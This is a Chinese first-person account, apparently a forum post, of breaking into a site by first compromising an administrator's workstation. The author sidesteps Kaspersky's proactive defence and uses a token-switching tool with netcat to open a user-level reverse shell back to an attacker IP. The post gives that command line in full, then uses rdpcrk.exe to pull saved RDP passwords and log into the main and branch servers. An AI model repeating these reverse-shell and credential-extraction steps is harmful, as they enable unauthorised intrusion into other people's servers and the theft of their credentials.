几天前费了不少力气拿到一管理员机器，主站我盘旋了很久，没有突破口，开了80，还有一个高端端口，当然就是3389了，一阵欣喜，管理员一定会登这个服务器的3389的。

    在机器是拿到了，翻了翻管理员机器里的东西，本来想装键盘记录的，发现有很多以ip命名的rdp文件，下了一个下回来打开看了一下，真幸运，保存了密码在rdp文件里的（这种情况只有读rdp的密码了，键盘记录记不到）。主站和各分站的3389都是以保存密码登录的，上传一个读取rdp密码的东西就可以读到密码了，但这时遇到一个很头痛的问题，我的马是系统权限的马，读取rdp文件的密码必须要在用户权限下。想装一个用户权限的马上去，可手里没好马，管理员机器上装了个卡巴斯基，还开了主动防御。试着折腾了一下，装其它的马，都被主动防御拦截，管理员还似乎有点发觉，开始检查机器，幸好这个马还稳当，先断开连接。

    接下来仔细想了一下，到底咋搞呢，必须要得到一个用户权限的shell，再上传马上去执行就不敢了，搞不好把现在的这个权限都弄掉。

    最后想起一个令牌转换的东西，试了一下直接用令牌转换工具运行rdpcrk.exe 加参数重定向到文本，结果没读取成功。于是就想到用nc通过令牌转换弹一个用户权限的shell回来。

在马里面执行cmd：change.exe  c:windows c.exe xx.xx.xx.xx 123 -e cmd.exe

在本地临听123端口，接到shell后，传个东西上去，whoami,呵呵，终于得到一个用户权限的shell。
然后rdpcrk.exe  xx.xx.xx.xx.rdp
成功得到密码，直登服务器，搞定。